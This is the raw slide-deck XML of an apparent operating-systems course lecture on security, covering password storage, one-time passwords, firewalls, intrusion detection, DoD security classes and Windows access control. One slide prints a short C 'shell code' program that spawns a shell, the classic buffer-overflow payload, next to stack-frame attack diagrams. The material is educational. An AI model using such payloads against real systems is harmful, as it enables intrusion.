              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"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assuring client is talking to correct server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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Asymmetric cryptography used to establish a secure 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session key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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(symmetric encryption) for bulk of communication during session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Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Communication between each computer then uses symmetric key cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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75374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User Authentication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1" y="1143000"/>
            <a:ext cx="8458199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Crucial to identify user correctly, as protection systems depend on user ID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User identity most often established through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passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, can be considered a special case of either keys or capabilities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Passwords must be kept secret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Frequent change of passwords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History to avoid repeats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Use of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non-guessable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</a:rPr>
              <a:t> passwords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Log all invalid access attempts (but not the passwords themselves)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Unauthorized transfer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Passwords may also either be encrypted or allowed to be used only once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Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Does encrypting passwords solve the exposure problem?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Might solve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sniffing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Consider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shoulder surfing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Consider Trojan horse keystroke logger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How are passwords stored at authenticating site?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62145124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Passwords </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="790575"/>
            <a:ext cx="8991600" cy="5076825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Encrypt to avoid having to keep secret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But keep secret anyway (i.e. Unix uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>superuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>-only readably file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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Use algorithm easy to compute but difficult to invert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Only encrypted password stored, never decrypted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Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to avoid the same password being encrypted to the same value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One-time passwords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Use a function based on a seed to compute a password, both user and computer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Hardware device / calculator / key fob to generate the password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Changes very frequently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Biometrics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Some physical attribute (fingerprint, hand scan)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Multi-factor authentication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Need two or more factors for authentication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i.e. USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"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latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>dongle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"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latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, biometric measure, and password</a:t>
            </a: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9602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35038" y="182563"/>
            <a:ext cx="795655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Implementing Security Defenses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584200"/>
            <a:ext cx="8839199" cy="4826000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Defense in depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is most common security theory – multiple layers of security</a:t>
            </a:r>
          </a:p>
          <a:p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Security policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>describes what is being secured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Vulnerability assessment compares real state of system / network compared to security policy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Intrusion detection endeavors to detect attempted or successful intrusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Signature-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>detection spots known bad patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Anomaly detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>spots differences from normal behavior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Can detect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zero-day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attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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False-positives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and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false-negatives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>a problem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Virus protection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Searching all programs or programs at execution for known virus patterns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Or run in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sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> so can’t damage system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Auditing, accounting, and logging of all or specific system or network activities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Practice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safe computing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>– avoid sources of infection, download from only “good” sites, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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40329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7575" y="-20638"/>
            <a:ext cx="8229600" cy="477838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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Firewalling to Protect Systems and Networks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381000"/>
            <a:ext cx="9144000" cy="4910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network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firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is placed between trusted and untrusted hosts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The firewall limits network access between these two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security domains</a:t>
            </a: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Can be tunneled or spoofed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Tunneling allows disallowed protocol to travel within allowed protocol (i.e., telnet inside of HTTP)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Firewall rules typically based on host name or IP address which can be spoofed</a:t>
            </a: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Personal firewall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software layer on given host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Can monitor / limit traffic to and from the host</a:t>
            </a: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Application proxy firewall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understands application protocol and can control them (i.e., SMTP)</a:t>
            </a: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System-call firewall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monitors all important system calls and apply rules to them (i.e., this program can execute that system call)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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2514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163638" y="179388"/>
            <a:ext cx="8034337" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Network Security Through  Domain Separation Via Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55299" name="Picture 4" descr="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228725"/>
            <a:ext cx="6835775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525831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55675" y="114300"/>
            <a:ext cx="7772400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Computer Security Classifications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15400" cy="51371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U.S. Department of Defense outlines four divisions of computer security: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A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b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>B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b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, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> – Minimal security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 – Provides discretionary protection through auditing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Divided into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> identifies cooperating users with the same level of protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> allows user-level access control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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> – All the properties of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b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, however each object may have unique sensitivity labels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Divided into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>B1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b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>B2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>B3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> – Uses formal design and verification techniques to ensure security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35986866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566737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Example: Windows 7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590675"/>
            <a:ext cx="8229600" cy="5343525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Security is based on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user accounts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Each user has unique security ID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Login to ID creates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security access token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Includes security ID for user, for user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s groups, and special privileges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Every process gets copy of token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System checks token to determine if access allowed or denied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Uses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> model to ensure access security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A subject tracks and manages permissions for each program that a user runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each object in Windows has a security attribute defined by a security descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, a file has a security descriptor that indicates the access permissions for all users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="657863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Example: Windows 7 (Cont.)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5350" y="1065213"/>
            <a:ext cx="6856413" cy="53435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Win added mandatory integrity controls – assigns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integrity label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>to each securable object and subject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Subject must have access requested in discretionary access-control list to gain access to object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Security attributes described by security descriptor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Owner ID, group security ID, discretionary access-control list, system access-control list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3061764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5263"/>
            <a:ext cx="7704137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Modified Shell Code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84288" y="1165225"/>
            <a:ext cx="6126162" cy="4530725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#include &lt;stdio.h&gt;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int main(int argc, char *argv[])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	execvp(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>‘‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>\bin\sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>‘‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>\bin \sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, NULL);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	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New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444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33450" y="168275"/>
            <a:ext cx="775335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Hypothetical Stack Frame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433638" y="5119688"/>
            <a:ext cx="2025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/>
              <a:t>Before attack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5768975" y="5148263"/>
            <a:ext cx="2057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/>
              <a:t>After attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1638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963" y="1173163"/>
            <a:ext cx="4783137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827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73125" y="155575"/>
            <a:ext cx="7813675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Great Programming Required?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28600" y="685800"/>
            <a:ext cx="8763000" cy="453072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For the first step of determining the bug, and second step of writing exploit code, yes</a:t>
            </a:r>
          </a:p>
          <a:p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Script kiddies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>can run pre-written exploit code to attack a given system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Attack code can get a shell with the processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s permissions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Or open a network port, delete files, download a program, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>etc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sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Depending on bug, attack can be executed across a network using allowed connections, bypassing firewalls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Buffer overflow can be disabled by disabling stack execution or adding bit to page table to indicate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>non-executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> state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Available in SPARC and x86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But still have security exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1200587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171925B1-284E-4B4E-9845-2C2E6E7F0178}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld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the Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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4921251" y="1981200"/>
            <a:ext cx="3460749" cy="4441825"/>
            <a:chOff x="412" y="1296"/>
            <a:chExt cx="1652" cy="2798"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34819" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="1296"/>
              <a:ext cx="1152" cy="2592"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="16D6EA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820" name="Line 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="3600"/>
              <a:ext cx="1152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821" name="Line 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="3360"/>
              <a:ext cx="1152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816" y="3648"/>
              <a:ext cx="124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</a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Executable Code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34828" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1152" y="3360"/>
              <a:ext cx="45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</a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Data</a:t>
              </a:r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1152" y="2880"/>
              <a:ext cx="4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</a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34830" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1152" y="1488"/>
              <a:ext cx="5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</a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34834" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="-432" y="2487"/>
              <a:ext cx="194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</a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Lower Memory Addresses</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34840" name="Group 24"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="1920"/>
              <a:ext cx="1152" cy="720"/>
              <a:chOff x="768" y="2400"/>
              <a:chExt cx="1152" cy="720"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34822" name="Line 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="768" y="240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823" name="Line 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="768" y="312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824" name="Line 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
